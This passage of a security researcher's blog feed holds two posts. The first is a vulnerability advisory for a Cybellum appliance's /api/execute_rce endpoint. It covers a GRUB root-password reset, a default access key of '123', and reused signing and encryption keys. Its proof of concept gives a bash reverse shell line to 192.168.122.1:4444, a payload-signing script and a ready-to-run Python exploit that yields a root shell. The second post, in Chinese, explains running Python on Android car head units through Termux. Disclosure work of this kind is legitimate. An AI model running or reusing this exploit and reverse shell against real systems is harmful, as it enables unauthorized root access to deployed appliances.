id="Another-easy-way-to-get-in"><a href="#Another-easy-way-to-get-in" class="headerlink" title="Another easy way to get in"></a>Another easy way to get in</h3><ol><li><p>convert qcow2 to vmdk </p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qemu-img convert -f qcow2 cybellum.qcow2 -O vmdk cybellum.vmdk</span><br></pre></td></tr></table></figure></li><li><p>Use VMware Workstation to create new virtual machine with existing virtual disk(cybellum.vmdk)</p><p><img src="image-20240106182339175.png" alt="image-20240106182339175" style="zoom:50%;" /></p></li><li><p>Grub and character console are available</p><p>Open virtual machine, hold <code>Shift</code> during loading Grub. Grub lacks protection. The next step is that we can reset the root password through grub.</p><p><img src="image-20240106182533068.png" alt="image-20240106182533068"></p><p> Print a lot of information during normal booting.</p><p><img src="image-20240106182807215.png" alt="image-20240106182807215"></p><p> After boot finished, virtual graph console without show login conversion like other normal condition. </p><p><img src="image-20240106183057195.png" alt="image-20240106183057195"></p><p> It indicate graph console is forbidden, but the virtual character console is still available. Use <code>ALT+F1-F6</code> switch to other console.</p><p><img src="image-20240106184303046.png" alt="image-20240106184303046"></p></li><li><p>reset root password</p><p>Open virtual machine, hold <code>Shift</code> during loading Grub. Go to submenu <code>Advcaned options for Ubuntu</code>.</p><p><img src="image-20240106184950501.png" alt="image-20240106184950501" style="zoom:82%;" /></p><p>You will then be prompted by a menu that looks something like this,continue enter to <code>recovery mode</code>.</p><p><img src="image-20240106185005189.png" alt="image-20240106185005189"></p><p>Using the arrow keys scroll down to <strong>root</strong> and then hit Enter.</p><p><img src="image-20240106185117207.png" alt="image-20240106185117207"></p><p>Now see a root prompt, something like this,set the user’s password with the <code>passwd</code> command.</p><p><img src="image-20240106185545651.png" alt="image-20240106185545651"></p></li><li><p>get access of the OS</p><p>After reboot the system,and hit <code>ALT+2</code> switch to character console, we are able to log in with the new password.</p><p><img src="image-20240106185719258.png" alt="image-20240106185719258"></p></li></ol><h3 id="Analysis-backdoor"><a href="#Analysis-backdoor" class="headerlink" title="Analysis backdoor"></a>Analysis backdoor</h3><p>According this keyword<code>execute_rce</code>, we did some digging and we found a backdoor api <code>/api/execute_rce</code>. Uploading an encrypted zip file containing start.sh can achieve arbitrary code execution and obtain the system with root privilege.</p><p>Login into Ubuntu, using <code>ss</code> know 29000 port is hosted by python.</p><p><img src="image-20240106191143538.png" alt="image-20240106191143538"></p><p>Grep the keyword <code>execute_rce</code>, source code at /usr/local/lib/python3.8/dist_packages/maintenance_server_microservic.</p><p><img src="image-20240106190919877.png" alt="image-20240106190919877"></p><p><code>exexute_rce</code> route path is <code>/api/execute_rce</code>. </p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ExecuteRCE</span>:</span></span><br><span class="line"> NAME = <span class="string">'execute_rce'</span></span><br><span class="line"> URI = <span class="string">'/api/execute_rce'</span></span><br><span class="line"> METHODS = [<span class="string">'POST'</span>]</span><br></pre></td></tr></table></figure><p>In maintenance_server_microservice has documentation.</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">% tree -L 2 maintenance_server_microservice</span><br><span class="line">.</span><br><span class="line">├── __init__.py</span><br><span class="line">├── __pycache__</span><br><span class="line">├── _maintenance_server_microservice.py</span><br><span class="line">├── apis</span><br><span class="line">├── app.py</span><br><span class="line">├── documentation</span><br><span class="line">│ ├── apis.html</span><br><span class="line">│ ├── common</span><br><span class="line">│ ├── cybellum-logo-black.svg</span><br><span class="line">│ ├── cybellum-logo-white.svg</span><br><span class="line">│ ├── description.md</span><br><span class="line">│ ├── docs-api-font.css</span><br><span class="line">│ ├── main.json</span><br><span class="line">│ ├── redoc.standalone.js</span><br><span class="line">│ └── schemas</span><br><span class="line">├── file_signer</span><br><span class="line">├── microservice</span><br><span class="line">├── scripts</span><br><span class="line">├── utils</span><br><span class="line">└── wsgi.py</span><br></pre></td></tr></table></figure><p>The document Maintenance Server API (1.0) on<code>http://ip:29000/docs/</code> .</p><p><img src="image-20240108105530439.png" alt="image-20240108105530439"></p><p>As the document show, The Maintenance Server is a service that expose an interface to the user that suppors the following operations:</p><ol><li><strong>System install</strong> - allows deployment of a fresh system using supplied installation pack.</li><li><strong>System update</strong> - allows deployment of a new version of the system</li><li><strong>Restore database</strong> - allows a system database restore after it was backed-up using the backup functionality.</li><li><strong>RCE Execution</strong> - allows execution of a signed script on the machine (supplied by Cybellum).</li><li><strong>Update certificates</strong> - allows update of the TLS/SSL certificates of the system</li></ol><p><strong>RCE Execution</strong> is the target that allows execution of a signed script on the machine. The sign process may be secure or not. Next we try to analyze the sign process and find the sign key. </p><p><code>execute-rce</code> API document available on <code>http://ip:29000/docs/#operation/execute-rce</code>.</p><p><img src="image-20240108105639641.png" alt="image-20240108105639641"></p><p>Function <code>api_execute_rce</code> implement in apis/apis.py.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">api_execute_rce</span>(<span class="params">self</span>):</span></span><br><span class="line"> args = parse_webargs(MaintenanceServerAPISParamsSpecs.EXECUTE_RCE, request)</span><br><span class="line"> api_params_names = MaintenanceServerAPIDefinitions.ExecuteRCE.Params</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> request.files <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">or</span> <span class="built_in">len</span>(request.files) != <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">raise</span> ReceivedNotEnoughFilesException()</span><br><span class="line"></span><br><span class="line"> access_key = args[api_params_names.ACCESS_KEY]</span><br><span class="line"> rce_file = api_params_names.RCE_FILE</span><br><span class="line"></span><br><span class="line"> self._validate_access_key(access_key)</span><br><span class="line"></span><br><span class="line"> temp_directory = filesystemex.create_temp_directory()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> self._unpack_file(temp_directory, rce_file, self.RCE_FILE)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> filesystemex.delete_folder(temp_directory)</span><br><span class="line"> <span class="keyword">raise</span></span><br><span class="line"></span><br><span class="line"> task = ExecuteRCETask(rce_file_name=self.RCE_FILE,</span><br><span class="line"> task_manager=self.task_manager,</span><br><span class="line"> files_root=temp_directory)</span><br><span class="line"> self.task_manager.submit_task(task)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> SuccessResponse({<span class="string">"task"</span>: task.to_json()[task.task_id]}).generate_response()</span><br></pre></td></tr></table></figure><p>api_execute_rce get two parameters <code>access_key</code> and <code>rce_file</code> from frontend. </p><p><img src="image-20240108110859694.png" alt="image-20240108110859694"></p><p>First, use validate_access_key(access_key) validate access key.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_validate_access_key</span>(<span class="params">self, access_key</span>):</span></span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(self.ACCESS_KEY_FILE_PATH) <span class="keyword">as</span> f:</span><br><span class="line"> content = json.load(f)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> content <span class="keyword">or</span> <span class="string">'access_key'</span> <span class="keyword">not</span> <span class="keyword">in</span> content <span class="keyword">or</span> content[<span class="string">'access_key'</span>] != access_key:</span><br><span class="line"> <span class="keyword">raise</span> InvalidAccessKeyException()</span><br></pre></td></tr></table></figure><p>ACCESS_KEY_FILE_PATH link to <code>/mnt/cybellum/maintenance_server/access_key.json</code>, default access_key is 123.</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{<span class="attr">"access_key"</span>:<span class="string">"123"</span>}</span><br></pre></td></tr></table></figure><p>Second, in <code>use _upack_file</code> to use <code>FileSigner.unpack_file</code> validate and decrypt encrypted file.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_unpack_file</span>(<span class="params">self, destination, file_name, unpacked_file_name</span>):</span></span><br><span class="line"> file_path = os.path.join(destination, file_name)</span><br><span class="line"> decrypted_file_path = os.path.join(destination, unpacked_file_name)</span><br><span class="line"></span><br><span class="line"> request.files[file_name].save(file_path)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(self.SIGN_KEY_HOME, self.PRIVATE_ENCRYPTION_KEY_PASS)) <span class="keyword">as</span> f:</span><br><span class="line"> private_encryption_key_pass = f.read().strip()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> FileSigner.unpack_file(file_path,</span><br><span class="line"> public_key_path=os.path.join(self.SIGN_KEY_HOME, self.SIGNATURE_PUBLIC_KEY),</span><br><span class="line"> private_encryption_key_path=os.path.join(self.SIGN_KEY_HOME,</span><br><span class="line"> self.ENCRYPTION_PRIVATE_KEY),</span><br><span class="line"> private_encryption_key_pass=private_encryption_key_pass,</span><br><span class="line"> path_to_extract_orig=decrypted_file_path)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> Exception:</span><br><span class="line"> <span class="keyword">raise</span> Exception(<span class="string">'Could not unpack file'</span>)</span><br></pre></td></tr></table></figure><p>Third, according to <code>unpack_file</code> , 4 step to unpack file.</p><ol><li>Read the signature from the unpacked file.</li><li>Load the public key <code>signature_public_key.pem</code>, and validate the signature of encrypted file md5.</li><li>Read the encrypted key from the unpacked file.</li><li>Read the encrypted file and decrypt it with symmetric_key<code>encryption_private_key.pem</code>.</li></ol><p>A packed file is constructed with three parts; signature segment, encryption parameter segment and encrypted data segment.</p><p><img src="image-20240106220903113.png" alt="image-20240106220903113" style="zoom: 60%;" /></p><p>Finally, use ExecuteRCETask execute <code>rce_file</code>.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ExecuteRCETask</span>(<span class="params">ExecutableTask</span>):</span></span><br><span class="line"> SCRIPT_NAME = <span class="string">"start.sh"</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self, rce_file_name, *args, **kwargs</span>):</span></span><br><span class="line"> <span class="built_in">super</span>(ExecuteRCETask, self).__init__(*args, **kwargs)</span><br><span class="line"> self.task_type = TaskTypes.EXECUTE_RCE.value</span><br><span class="line"> self.rce_file_name = rce_file_name</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">_execute_specific_task_callback</span>(<span class="params">self, *args, **kwargs</span>):</span></span><br><span class="line"> output_location = self.get_results_location()</span><br><span class="line"></span><br><span class="line"> self.run_subprocess([<span class="string">"unzip"</span>, os.path.join(self.files_root, self.rce_file_name)])</span><br><span class="line"> self.run_subprocess([<span class="string">"sudo"</span>, <span class="string">"chmod"</span>, <span class="string">"777"</span>, <span class="string">"-R"</span>, self.files_root])</span><br><span class="line"> exe_path=os.path.realpath(os.path.join(self.files_root, self.SCRIPT_NAME))</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(exe_path):</span><br><span class="line"> <span class="keyword">raise</span> MissingRceExeFile()</span><br><span class="line"> self.run_subprocess([<span class="string">"bash"</span>,</span><br><span class="line"> os.path.realpath(os.path.join(self.files_root, self.SCRIPT_NAME)),</span><br><span class="line"> output_location], preexec_fn=os.setpgrp)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(os.listdir(output_location)):</span><br><span class="line"> self.result_downloadable = <span class="literal">True</span></span><br></pre></td></tr></table></figure><p>The private key under /mnt/cybellum/maintenance_server/keys directory. </p><p><img src="image-20240108125724597.png" alt="image-20240108125724597"></p><ul><li><strong>encryption_private_key.pem</strong>: signature private key and encryption private key.</li><li><strong>private_pass.txt:</strong> private key password.</li><li><strong>signature_public_key.pem:</strong> Validate the signature public_key.</li></ul><p><strong>Key reuse:</strong> signature and encryption use the same key, encryption_private_key.pem deploy to signature, also deploy to encrypt and decrypt file. </p><p>Once we get access to the host system, we get a signature and encryption key from the system, so we can write any shell code in start.sh and pack. The platform consider it legal, and the shell script will be executed. We implemented remote code execution successfully. </p><p>If signature and encryption use different keys, and keep the signature’s private key safe. It may be more acceptable only cybellum is able to call <code>execute-rce</code> with the private key.</p><h3 id="Proof-of-concept"><a href="#Proof-of-concept" class="headerlink" title="Proof of concept"></a>Proof of concept</h3><ol><li><p>prepare reverse shell payload: <code>bash -i >& /dev/tcp/192.168.122.1/4444 0>&1"</code> save to start.sh </p></li><li><p>compress start.sh to rce.zip</p></li><li><p>signature and encryption zip file to rce.zip.packed.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sign_and_pack_file</span>(<span class="params">destination,file_name,packed_file_name</span>):</span></span><br><span class="line"> file_path = os.path.join(destination, file_name)</span><br><span class="line"> packed_file_path = os.path.join(destination, packed_file_name)</span><br><span class="line"> PRIVATE_ENCRYPTION_KEY_PASS = <span class="string">"maintenance_server/keys/private_pass.txt"</span></span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(PRIVATE_ENCRYPTION_KEY_PASS) <span class="keyword">as</span> f:</span><br><span class="line"> private_encryption_key_pass = f.read().strip()</span><br><span class="line"></span><br><span class="line"> FileSigner.sign_and_pack_file(private_key_path=<span class="string">"maintenance_server/keys/encryption_private_key.pem"</span>,private_key_pass=private_encryption_key_pass,input_file=file_path,signed_file_path=packed_file_path,public_encryption_key_path=<span class="string">"maintenance_server/keys/signature_public_key.pem"</span>)</span><br><span class="line"> print(<span class="string">'The file was signed successfully and was stored at {}'</span>.<span class="built_in">format</span>(packed_file_path)</span><br></pre></td></tr></table></figure></li><li><p>POST payload to <code>/api/execute_rce</code>.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">banner = '''</span><br><span class="line"> ██████╗ ██ ╔██████ ██████╗ █████╗ ██████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██████╗ </span><br><span class="line"> ██╔════╝ ██ ╚════║██ ██╔══██╗██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗</span><br><span class="line"> ██║ ██ ║██ ██████╔╝███████║██║ █████╔╝ ██║ ██║██║ ██║██║ ██║██████╔╝</span><br><span class="line"> ██║ ██ ║██ ██╔══██╗██╔══██║██║ ██╔═██╗ ██║ ██║██║ ██║██║ ██║██╔══██╗</span><br><span class="line"> ╚██████╗ ██ ╔██████╝ ██████╔╝██║ ██║╚██████╗██║ ██╗██████╔╝╚██████╔╝╚██████╔╝██║ ██║</span><br><span class="line"> ╚═════╝ ██ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝</span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line">url = "http://192.168.1.102:29000/api/execute_rce"</span><br><span class="line"></span><br><span class="line">files={'rce_file': open('E:/ing/cybellum/rce.zip.packed', 'rb')}</span><br><span class="line">payloads = {"access_key":"123"}</span><br><span class="line">headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}</span><br><span class="line">print(banner)</span><br><span class="line">print("Cybellum Backdoor exploit Program")</span><br><span class="line"></span><br><span class="line">response = requests.request("POST", url, data=payloads,headers=headers, files=files)</span><br><span class="line">if "result_downloadable" in response.text:</span><br><span class="line"> print("Exploit success")</span><br><span class="line">else:</span><br><span class="line"> print("Error")</span><br></pre></td></tr></table></figure></li><li><p>Get root shell</p><p><img src="cybellum_backdoor_exp.gif" alt=""></p></li></ol><h3 id="About-Us"><a href="#About-Us" class="headerlink" title="About Us"></a>About Us</h3><p><a href="https://twitter.com/delikely">@delikley</a> Security researcher @QAX StarV Security Lab.</p><p>@Imweekend Security researcher @CAERI.</p><h3 id="Timeline"><a href="#Timeline" class="headerlink" title="Timeline"></a>Timeline</h3><ul><li>2023-06-21 Contacting vendor through Email.</li><li>2023-06-26 Cybellum confirmed this issue.</li><li>2023-09-13 CVE RESERVED.</li><li>2023-10-09 Cybellum release of security advisory.</li><li>2024-02-18 release this security advisory.</li></ul><h3 id="More"><a href="#More" class="headerlink" title="More"></a>More</h3><ul><li><a href="https://cybellum.force.com/CustomerPortal/s/case/5004x00000XjTuS">Cybellum advisories</a></li><li><a href="https://github.com/delikely/advisories/tree/main/Cybellum">Researcher advisories</a></li></ul>]]></content>
<summary type="html"><h2 id="Take-a-glance-of-browser-I-find-Cybellum-RCE"><a href="#Take-a-glance-of-browser-I-find-Cybellum-RCE" class="headerlink" title="Take</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全进阶之Trick——Android车机运行Python</title>
<link href="http://delikely.github.io/2023/11/16/pydroid/"/>
<id>http://delikely.github.io/2023/11/16/pydroid/</id>
<published>2023-11-16T09:36:02.000Z</published>
<updated>2023-11-19T10:48:53.000Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全进阶之Trick——Android车机运行Python"><a href="#车联网安全进阶之Trick——Android车机运行Python" class="headerlink" title="车联网安全进阶之Trick——Android车机运行Python"></a>车联网安全进阶之Trick——Android车机运行Python</h2><p>在整车环境下,网络隔离划分出了多个网络。多数的 ECU(注,本文中的 ECU 特指支持 TCP/IP 协议栈的 ECU) 不能够与测试机直连,虽然通过内网穿透技术可以实现访问这些隔离的 ECU。在内网穿透环境下测试由于转发问题会出现异常连接的情况。例如,使用 Python 的 Scapy 模块编写 SOMEIP 脚本时无法建立连接。</p><p>Python 脚本比较灵活,支持的模块也比较多,但 Python 上车确实是个问题。智驾上往往原生支持Python,但通常作为测试入口的车机,Python 却不支持的。最近在漏洞挖掘中,在车机上对 Python 有迫切的需求,于是就又双叒叕去搜索了一下 Android 上运行Python的方法,所有的方案指向—— Python IDE APP。那就得安装一个 APP,但当下新出的车机有的加了系统签名验证导致第三方应用无法安装。那先试试安装APP这个方案。</p><h3 id="方案①:安装-Python-IDE-APP"><a href="#方案①:安装-Python-IDE-APP" class="headerlink" title="方案①:安装 Python IDE APP"></a>方案①:安装 Python IDE APP</h3><p> Qpython、Pydroid 是Android上用的比较多的编辑器/IDE。在能够安装第三方APP的车机上,使用 adb 安装上应用。然后使用就比较尴尬了,图形化界面在测试中是个弊端,把车机屏幕当成显示屏,外接键盘来测试?有的车机也不是识别键盘呀!</p><p>突然想起我手机上的 Termux 也是可以安装 Python。但是 Termux 也是图形的,也不是图形化——主界面是命令行。怎么通过ADB 使用纯命令行的 Termux 呢,尝试第二种方案——ADB中使用Termux。</p><blockquote><p>Termux是一款基于Android系统的终端模拟器应用程序,可以在Android设备上运行命令行界面和Linux软件包。它提供了一个完整的Linux环境,包括常用的命令行工具、编程语言和软件包管理器等。</p></blockquote><p><img src="7a1ea276b7443e7470d5659092906f8.jpg" alt="7a1ea276b7443e7470d5659092906f8" style="zoom:40%;" /></p><h3 id="方案②:ADB中使用Termux"><a href="#方案②:ADB中使用Termux" class="headerlink" title="方案②:ADB中使用Termux"></a>方案②:ADB中使用Termux</h3><p>首先看看 Termux 用的 SHELL 是哪个,直接查看环境,SHELL 的路径是 <code>/data/data/com.termux/files/usr/bin/bash</code></p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">~ $ <span class="built_in">echo</span> <span class="variable">$SHELL</span></span><br><span class="line">/data/data/com.termux/files/usr/bin/bash</span><br></pre></td></tr></table></figure><p>先拿手机试试,进入ADB SHELL 切换到 Termux 的SHELL。好消息,命令行的Termux进去了;坏消息,Python运行不了。</p><p><img src="image-20231116013338800.png" alt="image-20231116013338800" style="zoom:60%;" /></p><p>其实,已经装了 Python,运行不了的原因是缺少环境变量。缺啥补啥,这就去加个环境变量。添加环境变量 PATH 就能直接使用 python等命令了,指定依赖库的位置 LD_LIBRARY_PATH 也不可或缺。</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> LD_LIBRARY_PATH=/data/data/com.termux/files/usr/lib/</span><br><span class="line"><span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/data/data/com.termux/files/usr/bin</span><br></pre></td></tr></table></figure><p>环境变量设置好了,果然进来了。</p><p><img src="image-20231116014135737.png" alt="image-20231116014135737"></p><p>那么问题来了,虽然能用Python,但这辆车上不能安装第三方应用。那摆在眼前的是怎么在不安装 APK 的情况下使用Termux。都到这里了,证明ADB运行Python是可行的,那么继续下一步——迁移Termux。</p><h3 id="方案③:-迁移Termux"><a href="#方案③:-迁移Termux" class="headerlink" title="方案③: 迁移Termux"></a>方案③: 迁移Termux</h3><p>查看 Termux 安装后的文件结构发现,<code>/data/data/com.termux/files/usr/</code> 下不就是 POSIX 的文件系统结构么。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">.../data/com.termux $ tree -L 3 </span><br><span class="line">├── cache </span><br><span class="line">│ └── apt </span><br><span class="line">│ ├── archives </span><br><span class="line">│ ├── pkgcache.bin </span><br><span class="line">│ └── srcpkgcache.bin </span><br><span class="line">├── files </span><br><span class="line">│ ├── home </span><br><span class="line">│ │ └── test </span><br><span class="line">│ └── usr </span><br><span class="line">│ ├── bin </span><br><span class="line">│ ├── code </span><br><span class="line">│ ├── etc </span><br><span class="line">│ ├── include </span><br><span class="line">│ ├── lib</span><br><span class="line">│ ├── libexec </span><br><span class="line">│ ├── share</span><br><span class="line">│ ├── tmp </span><br><span class="line">│ └── var</span><br><span class="line">└── shared_prefs </span><br><span class="line">└── com.termux_preferences.xml</span><br></pre></td></tr></table></figure><p>车机的架构和手机架构一样,直接打包复制到车机上。</p><p><img src="5QjG2ijRYR7XCFk1rx44ZC4uUQxBEYPx.jpeg" alt="img" style="zoom:25%;" /></p><p>说干就干,复制到 <code>/data/local/tmp/</code> 下,设置好环境变量。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export LD_LIBRARY_PATH=/data/local/tmp/data/data/com.termux/files/usr/lib</span><br><span class="line">export PATH=$PATH:/data/local/tmp/data/data/com.termux/files/usr/bin</span><br></pre></td></tr></table></figure><p>Python 启动!</p><p><img src="image-20231116091737037.png" alt="image-20231116091737037"></p><p>能用就是包有点大 700M,想想感觉可以精简。</p><h3 id="方案④:独立的-Python"><a href="#方案④:独立的-Python" class="headerlink" title="方案④:独立的 Python"></a>方案④:独立的 Python</h3><p>手机是AARCH64,车机也是AARCH64, 那么 Termux 的Python软件包是不是能直接使用。 直接去 Termux 的包管理网站下载 <a href="https://packages.termux.dev/apt/termux-main/pool/main/p/python/python_3.11.6-1_aarch64.deb">python_3.11.6-1_aarch64.deb</a>。</p><p>deb 中有三个文件,其中 data.tar.gz 是主要的程序文件。</p><p><img src="image-20231116020747184.png" alt="image-20231116020747184"></p><p> data.tar.gz 放到车机里面却发现报错,缺少依赖环境。</p><p><img src="image-20231116092005407.png" alt="image-20231116092005407"></p><p>缺啥补啥,从Termux lib 中抠出来,有点未免太费劲了。都到这里了,还是尝试添加一下依赖吧。把 libandroid-support.so 上传到 /data/local/tmp/data/data/com.termux/files/usr/lib 竟然成了,不是连环的缺少依赖。</p><p><img src="image-20231116153844613.png" alt="image-20231116153844613"></p><p>又试了试 pip,包里面没有 pip。</p><p><img src="image-20231116153931709.png" alt="image-20231116153931709" style="zoom:80%;" /></p><p>补充了 pip,也能安装模块,但是不能使用,因为配置的 lib 路径的文件,必须和 termux 的文件结构一致才行。但独立出来,路径是固然要改的。于是想到修改pip下载模块的默认存储路径。配置需要写入配置文件到根目录,然而大部分车机的根目录是不可写的。</p><p><img src="image-20231116105602858.png" alt="image-20231116105602858"></p><p>继续修复Bug,那还不如直接用方案三中的直接复制过来Termux环境。老老实实用Termux的环境,占用的磁盘空间大就大点吧!</p><p><img src="d73dccec9b38de5463f3e91df31abf3aac5832fea003-h7c4Sg_fw658webp.webp" alt="“又不是不能用”表情包进化史,越来越抽象了" style="zoom:50%;" /></p><p>对了,还有一种方案就是使用虚拟环境 venv,直接使用 python -m venv venv 不出意料也报错,修复报错后,就大功告成了。打包好放在 <a href="https://github.com/delikely/Automotive-Security-Toolkit/tree/main/pydroid,各位看官自取。">https://github.com/delikely/Automotive-Security-Toolkit/tree/main/pydroid,各位看官自取。</a></p><p><img src="image-20231116154026357.png" alt="image-20231116154026357"></p><h3 id="方案⑤:静态编译Python"><a href="#方案⑤:静态编译Python" class="headerlink" title="方案⑤:静态编译Python"></a>方案⑤:静态编译Python</h3><p>话又说回来,不同的车机可能缺少的依赖不同,那存不存在静态编译的Python呢?这可能是最佳的方案,静态编译的 Python 和 pip,就像静态编译的 busybox 一样,没有依赖问题直接用。但是找了一圈又一圈,现成的压根没有,有没有愿意尝试静态编译 Python 的勇士呢?</p><h3 id="系列文章"><a href="#系列文章" class="headerlink" title="系列文章"></a>系列文章</h3><ol><li><a href="https://mp.weixin.qq.com/s/FzF7ERiWZ_GGKLW4kqrH9Q">车联网安全基础知识之汽车模块化平台</a></li><li><a href="https://mp.weixin.qq.com/s/YyHRexeKgGd4RAgQ4o-jKw">车联网安全基础知识之大众集团汽车电子电气架构</a></li><li><a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">车联网安全基础知识之TBOX主要功能</a></li><li><a href="https://mp.weixin.qq.com/s/RKU0YevKmSOJtb3NMOEy9w">车联网安全基础知识之大众J949(OCU/T-BOX)</a></li><li><a href="https://mp.weixin.qq.com/s/l1-RZ9rI09p__2hwPKSRVw">车联网安全基础知识之充电基础设施</a></li><li><a href="https://mp.weixin.qq.com/s/9KVNgiToeDsDIlR1FBMohw">车联网安全基础知识之从插线端子分析车内通信网络结构</a></li><li><a 